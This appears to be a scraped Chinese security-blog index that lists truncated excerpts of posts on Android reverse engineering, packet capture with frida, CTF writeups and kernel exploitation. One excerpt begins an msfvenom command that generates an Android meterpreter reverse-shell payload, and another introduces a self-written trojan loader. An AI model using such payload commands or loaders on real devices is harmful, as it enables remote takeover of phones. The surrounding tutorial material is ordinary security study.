工具1、jadx2、frida 网络请求框架分析请求协议通过查看app源码,可以清楚看到okhttp3的包名,使用okhttp3就很香。okhttp3分析1、打印网络请求通过他的sign或者sig3算...
11月23日398 views评论a
java
抓包quick手
11月23日398 views评论a
java
11月23日398 views评论a
java
二进制代码相似分析综述
工作来源ACM Computing Surveys 2022工作背景二进制代码相似判断有着广泛的用途,如 Bug 搜索、恶意软件聚类、恶意软件检测、恶意软件谱系跟踪、补丁生成、跨程序版本移植信息和软件...
11月23日157 views评论二进制
编译
Flare-On逆向挑战赛(二)
从2013年开始举办的Flare-On逆向挑战赛今年已经是第6届今年的比赛共有12道题目,涉及Windows,.NET,Linux和Android上x86的各种架构此外这也是Flare-On历史上的第...
11月22日11 views评论逆向
题目
强网杯拟态防御赛ez_upload Writeup
更多全球网络安全资讯尽在邑安全这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black t...
11月22日238 views评论ez
upload
安卓应用层协议/框架通杀抓包:实战篇
0x00.前言(文章分为实战和源码分析,本文为实战篇)环境和工具准备:kali-linuxpython 3.xr0capturefrida / frida-toolsapkshell0x01.什么是 ...
11月22日289 views评论frida
native
利用msf框架对安卓手机进行简单操作
测试机型红米k30 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888 R > vir...
11月22日454 views评论apk
html
巧用APP历史版本对APP登录signature分析
前言 之前在火线zone看到利用app历史版本来进行app的逆向分析,可以降低一下分析难度,比较老版本的安全防护做的不是很到位。正好最近有一个app,尝试利用一下老版本进行分析登录签名,没想到效果非常...
11月22日98 views评论app
版本
painLoader 加载器(无疫烦)
开发这款木马加载器(PainLoader)的初衷是我最近这段时间闲的蛋疼。其实主要是最近这段时间自己经历了一些比较难受的事情(Emm,说实话,很难受),为了转移自己的注意力,让自己能稍微缓一缓(但是,...
11月22日96 views评论cs
木马
游戏检测的对抗与防御艺术丨咖面114期
漏洞银行技术群:327085041每周五晚20:00 “大咖面对面”技术直播近日河南郑州新乡等城市的洪水,牵动无数人的心我们看到许多表哥用自己的方式为河南祈福也看到在灾难中无私助人的英雄愿...
11月22日88 views评论游戏检测的对抗与防御艺术丨咖面114期
鬼手
Android Linker详解
看雪论坛作者ID:r0ysue1简介接上篇Linker源码详解(一),本文继续来分析Linker的链接过程。为了更好的理解Unidbg的原理,我们需要了解很多细节。虽然一个模拟二进制执行框架的弊端很多...
11月21日163 views评论load
so
内核缓冲区溢出1--无保护
介绍 参考 https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/ 文件下载地址kernel-rop-bf9c106d459...
11月19日113 views内核缓冲区溢出1--无保护已关闭评论kernel
root
变量覆盖漏洞
变量覆盖漏洞大多由函数使用不当导致,经常引发变量覆盖漏洞的函数有:extract()函数和parse_str(),import_request_variables()函数则是用在没有开启全局变量注册的...
11月19日375 views变量覆盖漏洞已关闭评论函数
变量
861